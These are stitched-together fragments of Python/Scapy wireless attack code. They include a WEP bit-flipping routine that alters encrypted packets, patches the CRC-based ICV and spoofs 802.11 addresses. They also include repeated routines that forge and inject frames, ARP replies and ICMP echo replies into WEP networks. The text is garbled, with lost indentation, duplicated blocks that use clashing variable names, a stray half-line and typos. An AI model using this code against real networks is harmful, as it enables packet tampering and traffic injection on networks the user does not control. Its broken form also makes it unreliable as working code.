def flip_bits(self, packet):
wepdata = packet[Dot11WEP].wepdata
# Skip first 4 bytes corresponding to IV and KeyID
# The ICV is included in the cyphertext and corresponds to the last 4 bytes
cyphertext = str(packet[Dot11WEP])[4:]
flipped_packet = packet.copy() # Preserve the original wep packet
# Create bitmask with same size as the encrypted wepdata, excluding the ICV
bitmask = list('\x00' * len(wepdata))
# Flip bits of the bitmask corresponding to the last byte of sender MAC and IP respectively
bitmask[len(wepdata) - 15] = chr(randint(0, 255))
bitmask[len(wepdata) - 11] = chr(randint(0, 255))
# Create crc32 checksum for the bitmask
icv_patch = calc_crc32(bitmask)
icv_patch_bytes = pack("<I", icv_patch)
final_bitmask = bitmask + list(icv_patch_bytes) # Append the ICV patch to the bitmask data
# Now apply the 'patch' to the wepdata and the icv by XORing the final_bitmask with the original cyphertext
flipped_result = [ chr( ord(cyphertext[i]) ^ ord(final_bitmask[i]) ) for i in range(len(cyphertext)) ]
final_result = str(packet[Dot11WEP])[:4] + "".join(flipped_result)
# Put the results back in the packet
flipped_packet[Dot11WEP] = Dot11WEP(final_result)
# Now lets change the 802.11 information header to make it look like it came from a client.
flipped_packet[Dot11].FCfield = "from-DS+retry+wep"
flipped_packet[Dot11].addr1 = "ff:ff:ff:ff:ff:ff"
flipped_packet[Dot11].addr3 = (packet[Dot11].addr2[:-2] + "%02x") % randint(0, 255)
flipped_packet[Dot11].addr2 = self.ap_bssid
return flipped_packet
def handle_read(self):
# | 4 bytes | 4 bytes | 18 bytes | 1500 bytes |
# Tap VLAN Ether Header Frame
buf = self.read(1526)
eth_rcvd_frame = Ether(buf[4:])
#if DEBUG:
# os.write(1,"Received from %s\n" % ifname)
# if VERB:
# os.write(1,"%s\n" % eth_rcvd_frame.summary())
# Prepare Dot11 frame for injection
dot11_sent_frame = self.radiotap()
dot11_sent_frame /= Dot11(type="Data",
FCfield="from-DS",
addr1=eth_rcvd_frame.getlayer(Ether).dst,
addr2=self._tap.bssid)
# It doesn't seem possible to set tuntap interface MAC address
# when we create it, so we set source MAC here
if self._tap.smac == '':
dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
else:
dot11_sent_frame.addr3 = self._tap.smac
if self._tap.has_wep:
dot11_sent_frame.FCfield |= 0x40
dot11_sent_frame /= Dot11WEP(iv="111", keyid=self._tap.key_id)
dot11_sent_frame /= LLC(ctrl=3) / SNAP(code=eth_rcvd_frame.getlayer(
Ether).type) / eth_rcvd_frame.getlayer(Ether).payload
#if DEBUG:
# os.write(1,"Sending from-DS to %s\n" % OUT_IFACE)
# if VERB:
# os.write(1,"%s\n" % dot11_sent_frame.summary())
# Frame injection :
sendp(dot11_sent_frame, verbose=0) # Send from-DS frame
"Received ARP Request on %s\n" % options.in_iface)
if optios.verb:
os.write(1, "%s\n" % dot11_frame.summary())
# Building ARP Reply answer for injection
dot11_answer = RadioTap() / Dot11(
type="Data",
FCfield="from-DS",
addr1=dot11_frame.getlayer(Dot11).addr2,
addr2=options.bssid)
dot11_answer.addr3 = options.smac
if options.wepkey is not None:
dot11_answer.FCfield |= 0x40
dot11_answer /= Dot11WEP(iv="111", keyid=options.keyid)
dot11_answer /= LLC(ctrl=3) / SNAP() / ARP(
op="is-at",
hwsrc=options.smac,
psrc=dot11_frame.getlayer(ARP).pdst,
hwdst=dot11_frame.getlayer(ARP).hwsrc,
pdst=dot11_frame.getlayer(ARP).psrc)
dot11_answer /= dot11_frame.getlayer(ARP).payload
if options.debug:
os.write(1, "Sending ARP Reply on %s\n" % optios.out_iface)
if options.verb:
os.write(1, "%s\n" % dot11_answer.summary())
# Prepare Dot11 frame for injection
dot11_sent_frame = RadioTap() / Dot11(
type="Data",
FCfield="from-DS",
addr1=eth_rcvd_frame.getlayer(Ether).dst,
addr2=BSSID)
# It doesn't seem possible to set tuntap interface MAC address
# when we create it, so we set source MAC here
if not HAS_SMAC:
dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
else:
dot11_sent_frame.addr3 = SMAC
if WEP:
dot11_sent_frame.FCfield |= 0x40
dot11_sent_frame /= Dot11WEP(iv="111", keyid=KEYID)
dot11_sent_frame /= LLC(ctrl=3) / SNAP(
code=eth_rcvd_frame.getlayer(
Ether).type) / eth_rcvd_frame.getlayer(Ether).payload
if DEBUG:
os.write(1, "Sending from-DS to %s\n" % OUT_IFACE)
if VERB:
os.write(1, "%s\n" % dot11_sent_frame.summary())
# Frame injection :
sendp(dot11_sent_frame, verbose=0) # Send from-DS frame
# Frame from WiFi network
if s in r:
# Prepare Dot11 frame for injection
dot11_sent_frame = RadioTap() / Dot11(
type="Data",
FCfield="from-DS",
addr1=eth_rcvd_frame.getlayer(Ether).dst,
addr2=options.bssid)
# It doesn't seem possible to set tuntap interface MAC address
# when we create it, so we set source MAC here
if options.smac is None:
dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
else:
dot11_sent_frame.addr3 = options.smac
if options.wepkey is not None:
dot11_sent_frame.FCfield |= 0x40
dot11_sent_frame /= Dot11WEP(iv="111", keyid=options.keyid)
dot11_sent_frame /= LLC(ctrl=3) / SNAP(
code=eth_rcvd_frame.getlayer(
Ether).type) / eth_rcvd_frame.getlayer(Ether).payload
if options.debug:
os.write(1, "Sending from-DS to %s\n" % options.out_iface)
if options.verb:
os.write(1, "%s\n" % dot11_sent_frame.summary())
# Frame injection :
sendp(dot11_sent_frame, verbose=0) # Send from-DS frame
# Frame from WiFi network
if s in r:
if VERB:
os.write(1, "%s\n" % dot11_frame.summary())
# Building ICMP Echo Reply answer for injection
dot11_answer = RadioTap() / Dot11(
type="Data",
FCfield="from-DS",
addr1=dot11_frame.getlayer(Dot11).addr2,
addr2=BSSID)
if not HAS_SMAC:
dot11_answer.addr3 = dot11_frame.getlayer(Dot11).addr1
else:
dot11_answer.addr3 = SMAC
if WEP:
dot11_answer.FCfield |= 0x40
dot11_answer /= Dot11WEP(iv="111", keyid=KEYID)
dot11_answer /= LLC(ctrl=3) / SNAP() / IP(
src=dot11_frame.getlayer(IP).dst,
dst=dot11_frame.getlayer(IP).src,
ttl=TTL)
dot11_answer /= ICMP(type="echo-reply",
id=dot11_frame.getlayer(ICMP).id,
seq=dot11_frame.getlayer(ICMP).seq)
dot11_answer /= dot11_frame.getlayer(ICMP).payload
if DEBUG:
os.write(1, "Sending ICMP Echo Reply on %s\n" % OUT_IFACE)
if VERB:
os.write(1, "%s\n" % dot11_answer.summary())
# Frame injection :